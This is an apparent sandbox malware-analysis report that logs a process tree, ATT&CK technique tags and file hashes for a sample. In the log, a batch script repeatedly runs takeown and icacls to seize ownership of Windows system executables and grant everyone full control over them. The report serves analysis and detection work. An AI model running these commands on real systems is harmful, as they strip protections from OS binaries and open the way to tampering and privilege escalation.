C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\reset.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\reset.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\reset.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\rwinsta.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\rwinsta.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\rwinsta.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tscon.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tscon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tscon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tsdiscon.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tsdiscon.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tsdiscon.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tskill.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tskill.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..es-commandlinetools_31bf3856ad364e35_10.0.22000.1_none_4548a15e322e11ac\tskill.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\f\mstsc.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\f\mstsc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\f\mstsc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\mstsc.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\mstsc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\mstsc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\r\mstsc.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\r\mstsc.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..minalservicesclient_31bf3856ad364e35_10.0.22000.282_none_53574bb7dad4a93c\r\mstsc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..onagent-proxyobject_31bf3856ad364e35_10.0.22000.1_none_c40db8f2fa975bbd\RdpSaProxy.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..onagent-proxyobject_31bf3856ad364e35_10.0.22000.1_none_c40db8f2fa975bbd\RdpSaProxy.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..onagent-proxyobject_31bf3856ad364e35_10.0.22000.1_none_c40db8f2fa975bbd\RdpSaProxy.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..rvices-sessionagent_31bf3856ad364e35_10.0.22000.1_none_dbea4e9985e12d2f\RdpSa.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..rvices-sessionagent_31bf3856ad364e35_10.0.22000.1_none_dbea4e9985e12d2f\RdpSa.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..rvices-sessionagent_31bf3856ad364e35_10.0.22000.1_none_dbea4e9985e12d2f\RdpSa.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\f\RdpSaUacHelper.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\f\RdpSaUacHelper.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\f\RdpSaUacHelper.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\r\RdpSaUacHelper.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\r\RdpSaUacHelper.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\r\RdpSaUacHelper.exe" /grant "everyone":(f)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\RdpSaUacHelper.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\RdpSaUacHelper.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-t..sionagent-uachelper_31bf3856ad364e35_10.0.22000.120_none_c073b3a01f4d4399\RdpSaUacHelper.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tabletpc-inputpanel_31bf3856ad364e35_10.0.22000.1_none_72275dbeb0ac2289\TabTip32.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tabletpc-inputpanel_31bf3856ad364e35_10.0.22000.1_none_72275dbeb0ac2289\TabTip32.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tabletpc-inputpanel_31bf3856ad364e35_10.0.22000.1_none_72275dbeb0ac2289\TabTip32.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-takeown_31bf3856ad364e35_10.0.22000.1_none_5a83adc24ec7ef66\takeown.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-takeown_31bf3856ad364e35_10.0.22000.1_none_5a83adc24ec7ef66\takeown.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-takeown_31bf3856ad364e35_10.0.22000.1_none_5a83adc24ec7ef66\takeown.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tapicore_31bf3856ad364e35_10.0.22000.1_none_44d220827fc06fc2\dialer.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tapicore_31bf3856ad364e35_10.0.22000.1_none_44d220827fc06fc2\dialer.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tapicore_31bf3856ad364e35_10.0.22000.1_none_44d220827fc06fc2\dialer.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tapisetup_31bf3856ad364e35_10.0.22000.1_none_ca8b72bbd453db4c\TapiUnattend.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tapisetup_31bf3856ad364e35_10.0.22000.1_none_ca8b72bbd453db4c\TapiUnattend.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tapisetup_31bf3856ad364e35_10.0.22000.1_none_ca8b72bbd453db4c\TapiUnattend.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-taskkill_31bf3856ad364e35_10.0.22000.1_none_861646fd953a616a\taskkill.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-taskkill_31bf3856ad364e35_10.0.22000.1_none_861646fd953a616a\taskkill.exe"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-taskkill_31bf3856ad364e35_10.0.22000.1_none_861646fd953a616a\taskkill.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tasklist_31bf3856ad364e35_10.0.22000.1_none_88db7a29937b79fa\tasklist.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tasklist_31bf3856ad364e35_10.0.22000.1_none_88db7a29937b79fa\tasklist.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tasklist_31bf3856ad364e35_10.0.22000.1_none_88db7a29937b79fa\tasklist.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\ARP.EXE"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\ARP.EXE"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\ARP.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\finger.exe"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\finger.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\finger.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\HOSTNAME.EXE"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\HOSTNAME.EXE"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\HOSTNAME.EXE" /grant "everyone":(f)3⤵
- Possible privilege escalation attempt
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\MRINFO.EXE"2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\MRINFO.EXE"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\MRINFO.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\NETSTAT.EXE"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\NETSTAT.EXE"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\NETSTAT.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\ROUTE.EXE"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\ROUTE.EXE"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\ROUTE.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\TCPSVCS.EXE"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\TCPSVCS.EXE"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip-utility_31bf3856ad364e35_10.0.22000.1_none_935f3ba28807f81e\TCPSVCS.EXE" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip_31bf3856ad364e35_10.0.22000.1_none_c21dddd4c8838023\netiougc.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip_31bf3856ad364e35_10.0.22000.1_none_c21dddd4c8838023\netiougc.exe"3⤵
- Modifies file permissions
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-tcpip_31bf3856ad364e35_10.0.22000.1_none_c21dddd4c8838023\netiougc.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-terminalservices-theme_31bf3856ad364e35_10.0.22000.1_none_367e57d4b3f92c2f\TSTheme.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-terminalservices-theme_31bf3856ad364e35_10.0.22000.1_none_367e57d4b3f92c2f\TSTheme.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-terminalservices-theme_31bf3856ad364e35_10.0.22000.1_none_367e57d4b3f92c2f\TSTheme.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-thumbexthost_31bf3856ad364e35_10.0.22000.1_none_510540d2769488b0\ThumbnailExtractionHost.exe"2⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /f "C:\Windows\WinSxS\wow64_microsoft-windows-thumbexthost_31bf3856ad364e35_10.0.22000.1_none_510540d2769488b0\ThumbnailExtractionHost.exe"3⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\WinSxS\wow64_microsoft-windows-thumbexthost_31bf3856ad364e35_10.0.22000.1_none_510540d2769488b0\ThumbnailExtractionHost.exe" /grant "everyone":(f)3⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\TakeOwn.bat "C:\Windows\WinSxS\wow64_microsoft-windows-time-tool_31bf3856ad364e35_10.0.22000.1_none_4da1634e75184f71\w32tm.exe"2⤵
-
-
C:\Windows\msagent\AgentSvr.exeC:\Windows\msagent\AgentSvr.exe -Embedding1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x00000000000004E0 0x00000000000004EC1⤵
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Enumerates connected drives
- Checks SCSI registry key(s)
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
-
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca1⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe" -ServerName:CortanaUI.AppXstmwaab17q5s3y22tp6apqz7a45vwv65.mca1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Event Triggered Execution
3Accessibility Features
1AppInit DLLs
1Component Object Model Hijacking
1Power Settings
1Privilege Escalation
Access Token Manipulation
1Create Process with Token
1Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Event Triggered Execution
3Accessibility Features
1AppInit DLLs
1Component Object Model Hijacking
1Defense Evasion
Access Token Manipulation
1Create Process with Token
1File and Directory Permissions Modification
1Modify Registry
4Subvert Trust Controls
1SIP and Trust Provider Hijacking
1Discovery
Browser Information Discovery
1Network Share Discovery
1Peripheral Device Discovery
2Query Registry
6System Information Discovery
5System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
110B
MD500467f5f520372f61ab6c213dfe15c34
SHA14e80869c8e5a2ef5bfb082194ed5ce3cbee59357
SHA256abdef3e9d718e3a7fb3e02b0fff048ee85bd5de5e43aae997e5f8000e1548ec4
SHA512bea46549a721abbc50f4b5466a4a4cd55c8119d06a6b244f622e00fa61364bf199ddc875e0264158308a1e8b59a28ddbbc0d5c846f1b896ff4062e02e55e7b9c
-
Filesize
104B
MD5bef9b5e0707ead459e12a6b24e439356
SHA1fa33f3d8c495c5ec25617fcbb0a1e76f08955795
SHA2568fc152d863c3cf20354c74ba8fb09a2a68425de1cfe0be82868cff051020b02d
SHA51282798800651aa4ef77908a64b755048badc75da03e1c187d5250375893254660345ec534d379ce419345018c72f33d5c2647f7dc0bc60c160f9ff8d879da0cc1
-
Filesize
40B
MD546b257e2db3a3cab4fe4e8b36a53c612
SHA12327a773bca75530bc9bd7c74ef0ec3acbf99adf
SHA256e7c310337da9c0b11f73414f116c230092a508f82fe7a57d2fb80a16d1d0973f
SHA5126c9cdbac647aa323073edce54767cff14c7d54ae4b41034980833ccf8567d05985fb9a148772241f9a070622951af71e0cd943dddc1bbf445dc1c217393855e2
-
Filesize
649B
MD572834bcc1b7f0c3c61b2ff2eb2d8c5e8
SHA14059e2bc45178c7169bea5566f9c26bacc8906e7
SHA25615c14d5a2149f4f96aa45a45ec6424edfb5defc0893468a8ed542a23950b9c61
SHA51278ee0163b8602e091613361660c6d1d7b280deeb1d8c64bca6b1a29d179f2d37a4afadf1009ba31dafd629d276a22fa65740c85c5c0b59eec24e45bea7aca2e7
-
Filesize
2KB
MD53ce31871f3c7092fc92530128a545c2e
SHA139b75efe009c90482859361acaff8aafda648f6c
SHA2560277a534475cf9313e784c211f972af499806eae8916f2da998df6f04e987aa2
SHA5123dcc2850071875cd5f271def1022e75f78100e6b92bfefb06e91cc2a5746a0b0d0fabba1aa1a6d56db542ebe52138df6326b097f6d16207cb73380fa96faf327
-
Filesize
2KB
MD5020cfca5ed06afa9305bd4370b665a87
SHA1e6c6ed7a78ceddc23e569f9866ef04baaaf31480
SHA256bb7acc5b4de1dedae1248dfb1177f5f8def1eac2fdfd2bcb951e3ce19e893297
SHA5128c6531909786bc61c8d9319f36304261c36c2a51f7790221591613b12c14cca45bb1d76f1739d27370a5cd9aaf075dcc4f686ec98d949f287248e483ac9d8eac
-
Filesize
1KB
MD5c523173ab8cfa3167079f1f3de0ff510
SHA199d1df875c78a6ce87545802a619c8cc3516cac0
SHA25670d8291c9d4f978f5d4996f1eaa7cd3b358ca19f7b2012e0070bc54cd95f6e37
SHA512d6d87e52421a18378513c106a349adc10ca0a15d4a9d39c4fb4b651e4f0d7b89e1bed5d280ac355cb249677327798ed54a4946b48a1e071e5f316be876725389
-
Filesize
2KB
MD54d3c6a92bbb817e99af4d64b867ca68c
SHA15931e1f0e41ee8d3e0ce5710e99456d233c895b8
SHA256c47854796c3b155cbe80c3a283653d0aeba01467f439cd6c869776c628dae594
SHA51200f10c60cff821bf1a6f38157610a3dbd6cb9974aa8be23de31138b774f2f6a423e08aa0214d4809020fea5090a4e83e1d004e99b28655eef6fc3d25c2fde7ec
-
Filesize
2KB
MD55308bc9da5b4d536d86c06b3360dc835
SHA1e1a14c00f8952193bfb171eea4de547a1c8a6615
SHA256d31ceda26e355280cb7a7ad6b83412d33935593e3fc7d3be9eaae186418c9dd0
